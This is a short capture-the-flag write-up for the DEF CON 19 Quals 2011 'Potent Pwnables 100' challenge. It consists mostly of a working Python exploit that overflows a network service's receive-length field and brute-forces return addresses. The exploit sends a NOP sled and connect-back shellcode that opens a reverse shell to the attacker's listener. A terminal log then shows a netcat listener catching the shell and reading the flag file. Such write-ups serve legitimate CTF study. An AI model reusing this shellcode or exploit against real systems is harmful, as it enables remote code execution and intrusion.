Defcon 19th CTF 2011 Quals - Potent Pwnables 100

Category : Pwnables

* file

Summary : overwring max length of recving data

exploit.py

#!/usr/bin/python from socket import * import time def pack(data):  res = ""  for i in range(0,4):   res = res + chr(data % 0x100)   data = data / 0x100  return res HOST = "192.168.123.129" PORT = 3555 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8" + \ "\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" + \ "\x50\x54\x53\x50\xb0\x3b\xcd\x80" TOKEN = "tomod@chi4j00l333people$" for ret in range(0xbfbfefff , 0xbfbf0000 , -20):  ret = pack(ret)  if not "\x0a" in ret:   payload = ""   payload += "\x90"*40   payload += SHELLCODE   payload += ret   s = socket(AF_INET , SOCK_STREAM)   s.connect((HOST , PORT))   s.send(TOKEN+"\n")   s.send("pwn3r"*20+"\xff"+"\n")   s.send("1\n")   s.send("3\n"*14)   s.send(payload+"\n")   s.close()   time.sleep(0.2)

[pwn3r@localhost defcon19]$ ./exploit.py & nc -lv 4444 [1] 10196 Connection from 192.168.123.129 port 4444 [tcp/krb524] accepted id uid=1002(carebeard) gid=1002(carebeard) groups=1002(carebeard) ls -l total 28 -r--------  1 carebeard  carebeard     25 Sep 12 15:06 key -rwxr-xr-x  1 carebeard  carebeard  11056 Jul  9 13:24 pp100 cat key godzilla ate my tomagaci